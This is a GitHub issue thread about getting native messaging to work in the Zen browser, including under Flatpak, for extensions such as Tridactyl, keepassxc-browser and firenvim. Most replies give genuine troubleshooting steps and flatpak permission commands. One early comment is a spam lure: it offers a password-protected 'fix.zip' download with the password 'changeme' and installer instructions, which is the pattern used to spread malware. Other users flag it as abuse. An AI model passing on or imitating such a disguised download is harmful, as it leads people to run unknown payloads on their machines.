### ISSUE TITLE
Native Messenging Support (Tridactyl)

### ISSUE THREAD

**Issue by jechton** [zen-browser/desktop#725]
### What happened?

I normally use Tridactyl on Librewolf, and use Tridactyl's native messenger to source the config file from my computer. I am running both Librewolf and Zen as flatpaks, so I used Librewolf's modified install script to install Tridactyl's native messenger: https://librewolf.net/docs/faq/#how-can-i-get-tridactyls-native-messaging-to-work-when-i-install-librewolf-with-flatpak. When trying to move to Zen, I figured I could just use the same script and swap in the references to "Librewolf" for the correct folders in Zen, so io.gitlab.librewolf-community/.librewolf became io.github.zen_browser.zen/.zen. I also modified the flatpak permissions part to match. This didn't work, Tridactyl still says the native messenger is not installed. Does Zen not have native messaging support? Am I doing this wrong?

### Reproducible?

- [x] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by polymo1** [comment]
@IAmJafeth @mauro-balades @n7itro @NOCanoa please report and mark that comment as abuse.

**Comment by mauro-balades** [comment]
There's too many of these 😔

**Comment by korbal** [comment]
+1 here. does Zen support native messaging? I'm trying to set up the add-on TabFlow so that I can pipe open tabs into Rofi. it works with FF but not with Zen, and I just wonder if native messaging is available at all. If not, I won't try to brute force this :) Thanks!

**Comment by bonjour81** [comment]
+1 Native messenging is also needed for keepassxc-browser.

**Comment by andycandy-dev** [comment]
yes we need native messaging. we'd like to put our app manifest in `~/.zen/native-messaging-hosts`, thanks.

**Comment by slacksystem** [comment]
This also prevents the ever-helpful [firenvim](https://github.com/glacambre/firenvim) from being supported. I'm considering switching back to firefox for that alone, even though I really like so many of the features of Zen. (Why do so few browsers have vertical tabs?)

**Comment by NTICompass** [comment]
Native Messaging works in Zen (I don't know about in Flatpak, though), but to set it up, the config files need to go in `~/.mozilla/native-messaging-hosts`.

I was able to get KDE Plasma Integration and Mailvelope working in Zen this way.

See my comment on https://github.com/zen-browser/desktop/issues/349#issuecomment-2447899198

**Comment by mr-cheffy** [comment]
Ill move this into https://github.com/zen-browser/desktop/issues/349

**Comment by rfmejia** [comment]
FWIW I've been able to make Tridactyl native messaging work with Zen+Flatpak using the following sandbox permissions:

* In Flatseal, enable "Zen > Filesystem > All user files" or run `flatpak override --app.zen_browser.zen --filesystem=home`
* Run `flatpak permission-set webextensions tridactyl app.zen_browser.zen yes` (see [Tridactyl docs](https://github.com/tridactyl/tridactyl?tab=readme-ov-file#containerizedsandboxed-firefox-installations))
* Reboot

**Comment by kuvaldini** [comment]
@rfmejia i found nothing about `webextension` in https://docs.flatpak.org/en/latest/sandbox-permissions.html
is that undocumented feature?

**Comment by rfmejia** [comment]
@kuvaldini I can't find user documentation for specific portal/table/object permissions either (including `man flatpak-permissions`), I was only going by the workaround from the Tridactyl docs (substituting `snap.firefox` with the zen browser package name). I suspect if you dig into their developer/contributor docs you may find it.
